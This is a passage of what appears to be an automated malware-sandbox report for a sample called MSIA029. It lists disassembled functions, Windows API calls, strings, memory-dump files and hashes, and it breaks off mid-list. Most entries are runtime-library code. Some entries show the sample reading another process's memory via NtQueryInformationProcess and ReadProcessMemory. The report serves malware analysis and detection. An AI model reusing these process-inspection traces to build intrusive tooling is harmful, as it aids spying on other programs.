                                                                                                                                                                                                                                                  • Opcode ID: 8cc433a9c9aea2c60e693013b7d88818d670c67dda4114a8b657af49fcd0a51d
                                                                                                                                                                                                                                                  • Instruction ID: c9d604e0b268398b842c852dd607f156e5240a35f326310439f8eebfaeb73a52
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8cc433a9c9aea2c60e693013b7d88818d670c67dda4114a8b657af49fcd0a51d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1BB12571D04249AFEB20DF64CC86BEFBBB5AF05720F108129E504EB2C1DB749A48D7A1
                                                                                                                                                                                                                                                  Function 00F52B8C Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(00F8DD3C,00000FA0,?,?,00F52B6A), ref: 00F52B98
                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00F52B6A), ref: 00F52BA3
                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00F52B6A), ref: 00F52BB4
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00F52BC6
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00F52BD4
                                                                                                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00F52B6A), ref: 00F52BF7
                                                                                                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(00F8DD3C,00000007,?,?,00F52B6A), ref: 00F52C13
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00F52B6A), ref: 00F52C23
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00F52B9E
                                                                                                                                                                                                                                                  • SleepConditionVariableCS, xrefs: 00F52BC0
                                                                                                                                                                                                                                                  • WakeAllConditionVariable, xrefs: 00F52BCC
                                                                                                                                                                                                                                                  • kernel32.dll, xrefs: 00F52BAF
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                                                                                                                                                                  • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                  • API String ID: 2565136772-3242537097
                                                                                                                                                                                                                                                  • Opcode ID: 747470fac7e550bb4e4f3f8e34fbba6116a2e7581603e1e1347cb9e959ee1d51
                                                                                                                                                                                                                                                  • Instruction ID: 5f3c1c3c5ad97a37938eb315523f08950e66c4572684d0d66557e95ba1cabadb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 747470fac7e550bb4e4f3f8e34fbba6116a2e7581603e1e1347cb9e959ee1d51
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB01B572A54315ABD6213F75AC0CE667B689F827627014911FE08D22E0EBB4C845FB63
                                                                                                                                                                                                                                                  Function 00F55CAF Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 00F55DAC
                                                                                                                                                                                                                                                  • type_info::operator==.LIBVCRUNTIME ref: 00F55DCE
                                                                                                                                                                                                                                                  • ___TypeMatch.LIBVCRUNTIME ref: 00F55EDD
                                                                                                                                                                                                                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 00F55FAF
                                                                                                                                                                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 00F56033
                                                                                                                                                                                                                                                  • CallUnexpected.LIBVCRUNTIME ref: 00F5604E
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                                                                                                  • API String ID: 2123188842-393685449
                                                                                                                                                                                                                                                  • Opcode ID: 61be372a432dd627ba8a607e41589dab0fb3af56ef2fb2074da84d34755e732d
                                                                                                                                                                                                                                                  • Instruction ID: 97e20e11d47c986da3672bf359803c85ed80c8da7a2a197d9fcc9583a45af02c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61be372a432dd627ba8a607e41589dab0fb3af56ef2fb2074da84d34755e732d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13B1AE32C00609EFCF18DFA4C8A19AEB7B5FF14722F144059EE15AB212D734DA59EB91
                                                                                                                                                                                                                                                  Function 00F34270 Relevance: 15.1, APIs: 10, Instructions: 137timeCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000400,00000000,?,80A20388,?,?,?), ref: 00F342D2
                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,80A20388,?,?,?), ref: 00F342F3
                                                                                                                                                                                                                                                  • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,80A20388,?,?,?), ref: 00F34326
                                                                                                                                                                                                                                                  • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,80A20388,?,?,?), ref: 00F34337
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,80A20388,?,?,?), ref: 00F34355
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,80A20388,?,?,?), ref: 00F34371
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,80A20388,?,?,?), ref: 00F34399
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,80A20388,?,?,?), ref: 00F343B5
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,80A20388,?,?,?), ref: 00F343D3
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,80A20388,?,?,?), ref: 00F343EF
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseHandle$Process$OpenTimes
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1711917922-0
                                                                                                                                                                                                                                                  • Opcode ID: 4486db02ea1f50f58e70fb355ea1861e0971b825910253914ed70fa3f40d4678
                                                                                                                                                                                                                                                  • Instruction ID: 82ebb737f07b9d010b3bc32882871e1815436d636fe440871af8564dce385893
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4486db02ea1f50f58e70fb355ea1861e0971b825910253914ed70fa3f40d4678
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB517C70E01218EBDB10DF99D984BEEBBB8FF49724F244219E914B72C0C7746D05ABA5
                                                                                                                                                                                                                                                  Function 00F4BBBD Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F4BBC4
                                                                                                                                                                                                                                                    • Part of subcall function 00F4254E: __EH_prolog3.LIBCMT ref: 00F42555
                                                                                                                                                                                                                                                    • Part of subcall function 00F4254E: std::_Lockit::_Lockit.LIBCPMT ref: 00F4255F
                                                                                                                                                                                                                                                    • Part of subcall function 00F4254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00F425D0
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                  • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                                                                                                                                  • API String ID: 1538362411-2891247106
                                                                                                                                                                                                                                                  • Opcode ID: e007a82690e584713a79c9eb97976cfcf44894785c86d65cb3cdfc8714a37dc4
                                                                                                                                                                                                                                                  • Instruction ID: e6abb3e4fd18c136239eabd5c1276cf6818dfd4b1aecbc5c046de47add80a0fe
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e007a82690e584713a79c9eb97976cfcf44894785c86d65cb3cdfc8714a37dc4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41B1907290410AABDF19DFA8CD65EFE3FB9EB44324F044119FE0AA2252D731DA11EB51
                                                                                                                                                                                                                                                  Function 00F50C9D Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F50CA4
                                                                                                                                                                                                                                                    • Part of subcall function 00F39270: std::_Lockit::_Lockit.LIBCPMT ref: 00F392A0
                                                                                                                                                                                                                                                    • Part of subcall function 00F39270: std::_Lockit::_Lockit.LIBCPMT ref: 00F392C2
                                                                                                                                                                                                                                                    • Part of subcall function 00F39270: std::_Lockit::~_Lockit.LIBCPMT ref: 00F392EA
                                                                                                                                                                                                                                                    • Part of subcall function 00F39270: std::_Lockit::~_Lockit.LIBCPMT ref: 00F39422
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                                  • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                                                                                                                                  • API String ID: 1383202999-2891247106
                                                                                                                                                                                                                                                  • Opcode ID: f7eb8dfdac74f1bbdbd8401c34a7eb9b6f2cbbaf7d36eabda78b676c8742087c
                                                                                                                                                                                                                                                  • Instruction ID: c75f0dbfbf8fa8fddf625f13d2ad7952ef678ec7291ec286d8538cb382d56dcb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f7eb8dfdac74f1bbdbd8401c34a7eb9b6f2cbbaf7d36eabda78b676c8742087c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51B1B17290010AABCF19DF68CD5AEFE3BB9FB04311F144519FF06A6291DA31DA18EB51
                                                                                                                                                                                                                                                  Function 00F4BF7E Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F4BF85
                                                                                                                                                                                                                                                    • Part of subcall function 00F38610: std::_Lockit::_Lockit.LIBCPMT ref: 00F38657
                                                                                                                                                                                                                                                    • Part of subcall function 00F38610: std::_Lockit::_Lockit.LIBCPMT ref: 00F38679
                                                                                                                                                                                                                                                    • Part of subcall function 00F38610: std::_Lockit::~_Lockit.LIBCPMT ref: 00F386A1
                                                                                                                                                                                                                                                    • Part of subcall function 00F38610: std::_Lockit::~_Lockit.LIBCPMT ref: 00F3880E
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                                  • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                                                                                                                                  • API String ID: 1383202999-2891247106
                                                                                                                                                                                                                                                  • Opcode ID: 973e2a4be1dc1fd55128d173e32eae8abaa0c2afb32045ed2bafb0b549d3f3c2
                                                                                                                                                                                                                                                  • Instruction ID: 9ead19fed08a8fdb1497c524924c037bf4e41722e0c44711b4458c8305ff9d6a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 973e2a4be1dc1fd55128d173e32eae8abaa0c2afb32045ed2bafb0b549d3f3c2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BDB1BE7290110AAFCF59DFA8CD55EBE3FB9FB09750F045119FE02A2252D671CA10EBA1
                                                                                                                                                                                                                                                  Function 00F48555 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 00F4855C
                                                                                                                                                                                                                                                  • _Maklocstr.LIBCPMT ref: 00F485C5
                                                                                                                                                                                                                                                  • _Maklocstr.LIBCPMT ref: 00F485D7
                                                                                                                                                                                                                                                  • _Maklocchr.LIBCPMT ref: 00F485EF
                                                                                                                                                                                                                                                  • _Maklocchr.LIBCPMT ref: 00F485FF
                                                                                                                                                                                                                                                  • _Getvals.LIBCPMT ref: 00F48621
                                                                                                                                                                                                                                                    • Part of subcall function 00F41CD4: _Maklocchr.LIBCPMT ref: 00F41D03
                                                                                                                                                                                                                                                    • Part of subcall function 00F41CD4: _Maklocchr.LIBCPMT ref: 00F41D19
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                                                                                                                                                                                                  • String ID: false$true
                                                                                                                                                                                                                                                  • API String ID: 3549167292-2658103896
                                                                                                                                                                                                                                                  • Opcode ID: fa653f5d8b7eabe3e6026d909b87cb117afec056cb902b2fe81f8051948cf264
                                                                                                                                                                                                                                                  • Instruction ID: 588514ab6ab5b5f141be3aefe4244f55706b0eb5a6e63e801b77c538e44ce5f3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa653f5d8b7eabe3e6026d909b87cb117afec056cb902b2fe81f8051948cf264
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 682181B2D00308ABDF14EFA4DC85ACE7FA8BF05750F048116BD149F142DA74DA44DBA1
                                                                                                                                                                                                                                                  Function 00F39730 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 398COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::locale::_Init.LIBCPMT ref: 00F39763
                                                                                                                                                                                                                                                    • Part of subcall function 00F40C94: __EH_prolog3.LIBCMT ref: 00F40C9B
                                                                                                                                                                                                                                                    • Part of subcall function 00F40C94: std::_Lockit::_Lockit.LIBCPMT ref: 00F40CA6
                                                                                                                                                                                                                                                    • Part of subcall function 00F40C94: std::locale::_Setgloballocale.LIBCPMT ref: 00F40CC1
                                                                                                                                                                                                                                                    • Part of subcall function 00F40C94: std::_Lockit::~_Lockit.LIBCPMT ref: 00F40D17
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F3978A
                                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00F397F0
                                                                                                                                                                                                                                                  • std::locale::_Locimp::_Makeloc.LIBCPMT ref: 00F3984A
                                                                                                                                                                                                                                                    • Part of subcall function 00F3F57A: __EH_prolog3.LIBCMT ref: 00F3F581
                                                                                                                                                                                                                                                    • Part of subcall function 00F3F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F3F5C8
                                                                                                                                                                                                                                                    • Part of subcall function 00F3F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F3F620
                                                                                                                                                                                                                                                    • Part of subcall function 00F3F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F3F654
                                                                                                                                                                                                                                                    • Part of subcall function 00F3F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F3F6A8
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,00000000,?,00F854B1,00000000), ref: 00F399BF
                                                                                                                                                                                                                                                  • __cftoe.LIBCMT ref: 00F39B0B
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::locale::_$Locimp::_$AddfacLocimp_std::_$Lockit$H_prolog3Lockit::_$FreeInitLocalLocinfo::_Locinfo_ctorLockit::~_MakelocSetgloballocale__cftoe
                                                                                                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                                                                                                  • API String ID: 3103716676-1405518554
                                                                                                                                                                                                                                                  • Opcode ID: f915c26907f82652f60d01fb7c80af8b6827e63a7e0530640d2a451b339a7e9d
                                                                                                                                                                                                                                                  • Instruction ID: ad4d5a2b5b65444f2e27e101a847a8cee1e8e73eea8c52f9e07eacad384884e5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f915c26907f82652f60d01fb7c80af8b6827e63a7e0530640d2a451b339a7e9d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74F1BF71D05249DFDF10CFA8C884BEEBBB1EF49324F144169E805AB381E7B59A04DBA1
                                                                                                                                                                                                                                                  Function 00F33C20 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 225libraryloaderCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00F336D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00F33735
                                                                                                                                                                                                                                                    • Part of subcall function 00F336D0: _wcschr.LIBVCRUNTIME ref: 00F337C6
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 00F33CA8
                                                                                                                                                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,000001D8,00000000,00000000,00000018,00000000), ref: 00F33D01
                                                                                                                                                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,00000048,00000000,?,000001D8,00000000,00000000,00000018,00000000), ref: 00F33D7A
                                                                                                                                                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,?,?,?,00000048,00000000,?,000001D8), ref: 00F33EB1
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00F33F34
                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00F33F7B
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • NtQueryInformationProcess, xrefs: 00F33CA2
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: MemoryProcessRead$AddressDirectoryErrorFreeLastLibraryProcSystem_wcschr
                                                                                                                                                                                                                                                  • String ID: NtQueryInformationProcess
                                                                                                                                                                                                                                                  • API String ID: 566592816-2781105232
                                                                                                                                                                                                                                                  • Opcode ID: a45a5c8db43aa0ad4c712d872dc3733b451d4df25b29af47ffd3a5b33f7e9aed
                                                                                                                                                                                                                                                  • Instruction ID: 5690857886921a815558a381850d5c42216fb4d397252b98f4d44c780e33e2a8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a45a5c8db43aa0ad4c712d872dc3733b451d4df25b29af47ffd3a5b33f7e9aed
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34A14B70D04749DEDB20DF64CC49BAEBBF0BF48724F204599D449A7280E7B9AA88DF51
                                                                                                                                                                                                                                                  Function 00F340B0 Relevance: 12.2, APIs: 8, Instructions: 233memorytimeCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,40000022,80A20388,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00F34154
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,3FFFFFFF,80A20388,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00F34177
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F34217
                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000400,00000000,?,80A20388,?,?,?), ref: 00F342D2
                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,80A20388,?,?,?), ref: 00F342F3
                                                                                                                                                                                                                                                  • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,80A20388,?,?,?), ref: 00F34326
                                                                                                                                                                                                                                                  • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,80A20388,?,?,?), ref: 00F34337
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,80A20388,?,?,?), ref: 00F34355
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,80A20388,?,?,?), ref: 00F34371
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
